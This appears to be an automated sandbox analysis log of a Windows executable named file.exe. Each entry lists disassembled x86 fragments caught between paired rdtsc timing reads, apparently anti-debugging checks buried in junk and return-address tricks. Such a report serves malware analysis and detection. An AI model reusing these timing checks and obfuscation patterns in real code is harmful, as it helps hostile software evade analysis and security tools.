Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E701DE second address: E70260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F60F0C8AB58h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, dx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F60F0C8AB58h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 xor ebx, 47005B63h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F60F0C8AB58h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 xchg eax, esi 0x00000055 jmp 00007F60F0C8AB64h 0x0000005a push eax 0x0000005b push edi 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E721F4 second address: E721FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E721FE second address: E7224F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F60F0C8AB62h 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov dword ptr [ebp+122D1AEBh], esi 0x00000018 mov cl, 74h 0x0000001a popad 0x0000001b push 00000000h 0x0000001d and ebx, dword ptr [ebp+12450B0Ch] 0x00000023 push esi 0x00000024 mov ebx, 520E3AEEh 0x00000029 pop ebx 0x0000002a push eax 0x0000002b push eax 0x0000002c js 00007F60F0C8AB5Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E73176 second address: E73187 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E73187 second address: E7318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7318B second address: E73216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1032h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F60F0BA1028h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D2B28h] 0x0000002b jmp 00007F60F0BA1033h 0x00000030 mov dword ptr [ebp+122D1C7Fh], eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F60F0BA1028h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2914h] 0x00000058 push 00000000h 0x0000005a mov ebx, dword ptr [ebp+122D2B04h] 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push edi 0x00000066 pop edi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E73216 second address: E7321C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7418C second address: E741DE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F0BA1028h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F60F0BA1037h 0x00000012 mov edi, dword ptr [ebp+122D3368h] 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+122D2994h] 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D38E5h], ecx 0x00000029 mov dword ptr [ebp+122D1C77h], esi 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 jns 00007F60F0BA102Ch 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E772F8 second address: E77382 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F60F0C8AB58h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D28E8h] 0x00000029 xor dword ptr [ebp+122D17BCh], esi 0x0000002f push 00000000h 0x00000031 sub ebx, 2E34058Bh 0x00000037 pushad 0x00000038 jmp 00007F60F0C8AB61h 0x0000003d mov edi, dword ptr [ebp+122D2828h] 0x00000043 popad 0x00000044 push 00000000h 0x00000046 cld 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 jmp 00007F60F0C8AB62h 0x0000004e jne 00007F60F0C8AB61h 0x00000054 popad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E77382 second address: E77387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E78332 second address: E78336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E78336 second address: E7833A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6B117 second address: E6B1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jl 00007F60F0C8AB5Ch 0x0000000e jp 00007F60F0C8AB56h 0x00000014 jmp 00007F60F0C8AB68h 0x00000019 popad 0x0000001a nop 0x0000001b mov dword ptr [ebp+122D17C7h], esi 0x00000021 mov ebx, dword ptr [ebp+122D32E2h] 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cmc 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 sub dword ptr [ebp+12453C6Ch], edx 0x0000003c mov eax, dword ptr [ebp+122D16D1h] 0x00000042 cmc 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007F60F0C8AB58h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f mov di, 0A8Eh 0x00000063 nop 0x00000064 jmp 00007F60F0C8AB62h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jno 00007F60F0C8AB5Ch 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E826E7 second address: E826EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E826EC second address: E82713 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F60F0C8AB62h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60F0C8AB5Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E82713 second address: E82719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E82719 second address: E8271D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81EAF second address: E81EB9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81EB9 second address: E81ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81ECF second address: E81ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81ED9 second address: E81EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F60F0C8AB56h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E82047 second address: E8204B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6D1CD second address: E6D1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8588E second address: E858A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F60F0BA102Ah 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E858A6 second address: E858AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E858AC second address: E858C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F60F0BA1034h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F60F0BA1026h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E858C2 second address: E858D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7242B second address: E72434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E733F2 second address: E7345A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F60F0C8AB56h 0x00000009 jmp 00007F60F0C8AB66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov dword ptr [ebp+122D3783h], eax 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov bx, 9B3Ah 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c adc ebx, 72CB36C1h 0x00000032 mov eax, dword ptr [ebp+122D16C1h] 0x00000038 mov edi, dword ptr [ebp+122D1F2Ch] 0x0000003e mov dword ptr [ebp+12450A20h], eax 0x00000044 push FFFFFFFFh 0x00000046 mov ebx, dword ptr [ebp+122D2B18h] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 jnl 00007F60F0C8AB56h 0x00000056 pop edi 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7345A second address: E7345F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7345F second address: E7347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60F0C8AB63h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7347E second address: E73499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7431B second address: E7431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7431F second address: E7433A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8DEE8 second address: E8DEF2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8DEF2 second address: E8DEFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F60F0BA1026h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D4C7 second address: E8D4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D620 second address: E8D639 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F60F0BA102Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D8F9 second address: E8D910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D910 second address: E8D914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8DD5F second address: E8DD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8DD68 second address: E8DD82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E94257 second address: E9425E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E92F74 second address: E92F96 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F0BA102Ch 0x00000008 jl 00007F60F0BA1026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F60F0BA1028h 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93263 second address: E93269 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93269 second address: E932AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F60F0BA1039h 0x0000000a jmp 00007F60F0BA1037h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F60F0BA1026h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93559 second address: E9355D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9355D second address: E93582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA1031h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F60F0BA1026h 0x00000013 jp 00007F60F0BA1026h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93582 second address: E93586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93586 second address: E935B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F60F0BA1026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F60F0BA1035h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 jnp 00007F60F0BA1026h 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E92CD5 second address: E92CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93986 second address: E9398C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93AFF second address: E93B09 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F0C8AB72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93C6A second address: E93CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA102Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F60F0BA1036h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 jnp 00007F60F0BA102Eh 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93F53 second address: E93FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F60F0C8AB69h 0x0000000a jno 00007F60F0C8AB58h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F60F0C8AB69h 0x00000017 pushad 0x00000018 jmp 00007F60F0C8AB68h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93FAF second address: E93FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F60F12493A6h 0x00000012 jg 00007F60F12493A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E98B9F second address: E98BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9B872 second address: E9B87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA0147 second address: EA014B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA014B second address: EA0151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA0151 second address: EA0157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E27195 second address: E2719E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2719E second address: E271B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F1137216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F60F113721Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E271B7 second address: E271BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E679CA second address: E67A4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F113721Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a js 00007F60F1137216h 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov cl, bl 0x00000017 jmp 00007F60F1137227h 0x0000001c lea eax, dword ptr [ebp+12489779h] 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007F60F1137218h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c and ecx, dword ptr [ebp+122D19C7h] 0x00000042 mov dh, bl 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 push esi 0x00000048 jmp 00007F60F1137227h 0x0000004d pop esi 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A4D second address: E67A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A53 second address: E67A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F113721Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F1137222h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A79 second address: E44950 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60F12493A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jno 00007F60F12493A6h 0x00000011 call dword ptr [ebp+12450DCDh] 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F60F12493A8h 0x0000001f jns 00007F60F12493AAh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68030 second address: E68040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68139 second address: E6813D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6813D second address: E6815B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F60F1137224h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6815B second address: E6818E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F12493A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F60F12493B7h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F60F12493A8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6818E second address: E681CF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F113722Eh 0x00000008 jmp 00007F60F1137228h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F1137229h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68453 second address: E68458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68458 second address: E6845E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6845E second address: E6848A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F60F12493B5h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jbe 00007F60F12493B4h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
